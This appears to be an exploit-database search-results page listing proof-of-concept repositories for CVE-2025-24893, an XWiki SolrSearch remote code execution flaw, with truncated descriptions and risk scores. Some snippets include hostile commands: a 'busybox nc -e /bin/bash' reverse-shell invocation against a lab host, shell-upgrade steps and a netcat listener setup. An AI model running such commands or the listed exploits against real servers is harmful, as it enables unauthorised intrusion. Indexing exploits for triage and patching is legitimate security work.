Lucene search
+L

34 matches found

Kitploit
Kitploit
added 2026/09/09 10:51 p.m.4 views

CVE-2025-24893-POC

CVE-2025-24893-POC Un POC para CVE-2025-24893 escrito en python Uso python3 -u the url...

9.8CVSS8.1AI score0.99864EPSS
SaveExploits52
Kitploit
Kitploit
added 2026/09/09 7:58 p.m.4 views

CVE-2025-24893-RCE-PoC

Infos This PoC first tests for the SSTI and if it works. It will go in loop and allows you to run commands remotly. The exec and shell command do the same currently. Installation root@kitploit: python3 -m pip install requirements.txt Usage Connecting root@kitploit: python3 poc.py Example With deb...

9.8CVSS8AI score0.99864EPSS
SaveExploits52
Kitploit
Kitploit
added 2026/09/09 2:51 p.m.8 views

CVE-2025-24893

Reverse shell para CVE-2025-24893 root@kitploit: python3 CVE-2025-24893.py -u http://wiki.editor.htb/ -c "busybox nc -e /bin/bash" mejorar la shell 1. python3 -c 'import pty; pty.spawn"/bin/bash"' 2. ctrl + z 3. stty size 4. stty raw -echo; fg 5. stty rows x columns y 6. export TERM=xterm...

9.8CVSS8.1AI score0.99864EPSS
SaveExploits52
Kitploit
Kitploit
added 2026/09/09 1:35 p.m.5 views

CVE-2025-24893-POC

CVE-2025-24893 Install bun: root@kitploit: curl -fsSL https://bun.com/install | bash To install dependencies: root@kitploit: bun install To run: root@kitploit: bun run CVE-2025-24893.ts This project was created using bun init in bun v1.2.19. Bun is a fast all-in-one JavaScript runtime. How to use...

9.8CVSS8.1AI score0.99864EPSS
SaveExploits52
Kitploit
Kitploit
added 2026/09/09 10:07 a.m.4 views

CVE-2025-24893-PoC

Disclaimer: The vulnerabilities and reproduction steps described in this document are intended solely for cybersecurity research and educational purposes. No one shall use the information provided in this document for illegal purposes or unauthorized system testing. The author assumes no...

9.8CVSS7.9AI score0.99864EPSS
SaveExploits52
Kitploit
Kitploit
added 2026/09/09 4:43 a.m.6 views

CVE-2025-24893

CVE-2025-24893 Usage root@kitploit: python CVE-2025-24893 http://target.com...

9.8CVSS8.1AI score0.99864EPSS
SaveExploits52
Kitploit
Kitploit
added 2026/09/09 1:01 a.m.4 views

CVE-2025-24893

CVE-2025-24893 Bash POC script for RCE vulnerability in XWiki Platform Example usage: Setup a netcat listener: root@kitploit: $ nc -nvlp Then run the script: root@kitploit: $ chmod +x cve.sh $ ./cve.sh Affected versions: From 5.4 up to 15.10.11 From 16.0.0 up to 16.4.1 Disclamer This tool is for...

9.8CVSS8.1AI score0.99864EPSS
SaveExploits52
Kitploit
Kitploit
added 2026/09/08 10:01 p.m.7 views

CVE-2025-24893

CVE-2025-24893 XWiki RCE Vulnerability Analysis Environment Setup 1. Running XWiki 15.10.10 Environment root@kitploit: docker-compose up -d 2. Accessing XWiki URL: http://localhost:8080 Proceed with testing after completing the initial setup Create an admin account after accessing the initial...

9.8CVSS8.1AI score0.99864EPSS
SaveExploits52
Kitploit
Kitploit
added 2026/09/07 3:00 p.m.3 views

xwiki-cve-2025-24893-poc

PoC de Exploit RCE en XWiki CVE-2025-24893 Descripción general Este repositorio contiene una Prueba de Concepto PoC del exploit para la vulnerabilidad de Ejecución Remota de Código RCE en XWiki identificada como CVE-2025-24893. La vulnerabilidad permite a un atacante ejecutar código arbitrario en...

9.8CVSS8.6AI score0.99864EPSS
SaveExploits52References1
Kitploit
Kitploit
added 2026/09/06 6:22 a.m.8 views

xwiki_solrsearch-rce-exploit

solrsearch-rce-exploit Unauth RCE PoC for XWiki SolrSearch CVE-2025-24893. Command exec + reverse shell. CVE-2025-24893 – XWiki SolrSearch RCE PoC Proof-of-concept for the XWiki SolrSearch template injection leading to unauthenticated remote code execution. Tested against XWiki Debian 15.10.8...

9.8CVSS8.1AI score0.99864EPSS
SaveExploits52
Kitploit
Kitploit
added 2026/09/06 5:00 a.m.7 views

POC-for-CVE-2025-24893

Only for assisting with vulnerability remediation, do not use for other purposes...

9.8CVSS7.9AI score0.99864EPSS
SaveExploits52
Kitploit
Kitploit
added 2026/09/05 9:47 p.m.5 views

xwiki-15.10.8-reverse-shell-cve-2025-24893

Exploit de Reverse Shell CVE-2025-24893 para XWiki Descargo de responsabilidad: Este script está destinado solo con fines educativos y pruebas de seguridad autorizadas. No lo utilice en sistemas que no posea o para los que no tenga permiso explícito para realizar pruebas. El mal uso puede ser...

9.8CVSS8.1AI score0.99864EPSS
SaveExploits52References1
Kitploit
Kitploit
added 2026/09/05 7:17 p.m.4 views

XWiki-Platform-RCE-CVE-2025-24893

XWiki Platform Unauthenticated RCE Exploit Overview This script is a refurbished Bash implementation of an exploit targeting the XWiki Platform versions affected by CVE-2025-24893. It leverages a critical unauthenticated remote code execution vulnerability that allows attackers to execute arbitra...

9.8CVSS7.9AI score0.99864EPSS
SaveExploits52References1
Nuclei
Nuclei
added 2026/08/25 6:03 a.m.119 views

XWiki Platform - Remote Code Execution

Any guest can perform arbitrary remote code execution through a request to SolrSearch. This impacts the confidentiality, integrity, and availability of the whole XWiki installation. This vulnerability has been patched in XWiki 15.10.11, 16.4.1, and 16.5.0RC1. id: CVE-2025-24893 info: name: XWiki...

9.8CVSS9.2AI score0.99864EPSS
SaveExploits52References2
GithubExploit
GithubExploit
added 2026/08/19 11:30 a.m.20 views

Exploit for Eval Injection in Xwiki

CVE-2025-24893 - XWiki SolrSearch SSTI to unauthenticated RCE...

9.8CVSS8.5AI score0.99864EPSS
SaveExploits52
GithubExploit
GithubExploit
added 2026/01/26 2:21 p.m.204 views

Exploit for Eval Injection in Xwiki

CVE-2025-24893- CVE-20...

9.8CVSS5.9AI score0.99864EPSS
SaveExploits52
GithubExploit
GithubExploit
added 2025/12/28 6:40 p.m.259 views

Exploit for Code Injection in Xwiki

CVE-2025-24893 – XWiki Remote Command Execution Proof of Conc...

9.8CVSS8.2AI score0.99864EPSS
SaveExploits52
GithubExploit
GithubExploit
added 2025/12/19 10:52 a.m.162 views

Exploit for Code Injection in Xwiki

CVE-2025-24893 Remote Code Execution exploit for XWikihttp...

9.8CVSS7.2AI score0.99864EPSS
SaveExploits52
GithubExploit
GithubExploit
added 2025/12/03 8:43 p.m.262 views

Exploit for Code Injection in Xwiki

XWiki Platform Unauthenticated RCE Exploit Overview This s...

9.8CVSS9.5AI score0.99864EPSS
SaveExploits52
GithubExploit
GithubExploit
added 2025/11/28 1:26 a.m.174 views

Exploit for Code Injection in Xwiki

Description: XWiki Platform is a generic wiki platform offering...

9.8CVSS8.3AI score0.99864EPSS
SaveExploits52
Rows per page
Query Builder